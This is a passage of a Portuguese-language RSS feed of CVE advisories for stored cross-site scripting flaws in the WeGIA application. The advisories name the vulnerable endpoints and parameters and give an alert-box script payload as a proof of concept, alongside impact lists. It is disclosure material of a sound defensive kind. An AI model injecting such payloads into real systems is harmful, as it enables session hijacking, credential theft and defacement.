&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;adicionar_unidade.php&amp;lt;/code&amp;gt; do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;Unidade&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/html/matPat/adicionar_unidade.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-6694-cross-site-scripting-xss-armazenado-no-endpoint-adicionar_unidadephp-parâmetro-unidade&amp;#34;&amp;gt;CVE-2025-6694: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;adicionar_unidade.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;Unidade&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-6694&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-6694&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;adicionar_unidade.php&amp;lt;/code&amp;gt; do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;Unidade&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/html/matPat/adicionar_unidade.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;Unidade&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;Unidade&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;Poc VulDB&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt; &amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6694/image.png&amp;#34;
	width=&amp;#34;1896&amp;#34;
	height=&amp;#34;993&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6694/image_hu_aa98354b3826b69.png 480w, /p/cve-2025-6694/image_hu_f42a65e996076c92.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;190&amp;#34;
		data-flex-basis=&amp;#34;458px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6694/image-1.png&amp;#34;
	width=&amp;#34;1879&amp;#34;
	height=&amp;#34;990&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6694/image-1_hu_ee83094dec5adefe.png 480w, /p/cve-2025-6694/image-1_hu_384fcc464a1d2a6.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;189&amp;#34;
		data-flex-basis=&amp;#34;455px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6694/image-2.png&amp;#34;
	width=&amp;#34;1884&amp;#34;
	height=&amp;#34;976&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6694/image-2_hu_a237a910db38d115.png 480w, /p/cve-2025-6694/image-2_hu_afe9be25709c469f.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;193&amp;#34;
		data-flex-basis=&amp;#34;463px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6694/image-3.png&amp;#34;
	width=&amp;#34;1890&amp;#34;
	height=&amp;#34;988&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6694/image-3_hu_e1aad1c294d8b48e.png 480w, /p/cve-2025-6694/image-3_hu_547e87c56180f7a2.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;191&amp;#34;
		data-flex-basis=&amp;#34;459px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;vídeo-poc&amp;#34;&amp;gt;Vídeo PoC:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.youtube.com/watch?v=X7DJmOtNqxU&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.youtube.com/watch?v=X7DJmOtNqxU&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6694.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6694.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/raul50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Raul Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 26 Jun 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-6695</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-6695/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-6695/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-6695-cross-site-scripting-xss-armazenado-no-endpoint-adicionar_categoriaphp-parâmetro-categoria&amp;#34;&amp;gt;CVE-2025-6695: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;adicionar_categoria.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;Categoria&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-6695&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-6695&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;adicionar_categoria.php&amp;lt;/code&amp;gt; do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;Categoria&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/html/matPat/adicionar_categoria.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-6695-cross-site-scripting-xss-armazenado-no-endpoint-adicionar_categoriaphp-parâmetro-categoria&amp;#34;&amp;gt;CVE-2025-6695: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;adicionar_categoria.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;Categoria&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-6695&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-6695&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;adicionar_categoria.php&amp;lt;/code&amp;gt; do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;Categoria&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/html/matPat/adicionar_categoria.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;Categoria&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;Categoria&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;Poc VulDB&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt; &amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6695/image.png&amp;#34;
	width=&amp;#34;1911&amp;#34;
	height=&amp;#34;992&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6695/image_hu_fe6ecfa94b00b912.png 480w, /p/cve-2025-6695/image_hu_707ca28be50f53f5.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;192&amp;#34;
		data-flex-basis=&amp;#34;462px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6695/image-1.png&amp;#34;
	width=&amp;#34;1890&amp;#34;
	height=&amp;#34;988&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6695/image-1_hu_e1aad1c294d8b48e.png 480w, /p/cve-2025-6695/image-1_hu_547e87c56180f7a2.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;191&amp;#34;
		data-flex-basis=&amp;#34;459px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;vídeo-poc&amp;#34;&amp;gt;Vídeo PoC:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://youtu.be/VZs4hmHYaXQ&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://youtu.be/VZs4hmHYaXQ&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6695.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6695.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/raul50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Raul Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 26 Jun 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-6696</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-6696/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-6696/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-6696-cross-site-scripting-xss-armazenado-no-endpoint-cadastro_atendidophp-parâmetro-cpf&amp;#34;&amp;gt;CVE-2025-6696: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;Cadastro_Atendido.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-6696&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-6696&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;Cadastro_Atendido.php&amp;lt;/code&amp;gt; do aplicativo WeGIA. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/html/atendido/Cadastro_Atendido.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-6696-cross-site-scripting-xss-armazenado-no-endpoint-cadastro_atendidophp-parâmetro-cpf&amp;#34;&amp;gt;CVE-2025-6696: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;Cadastro_Atendido.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;
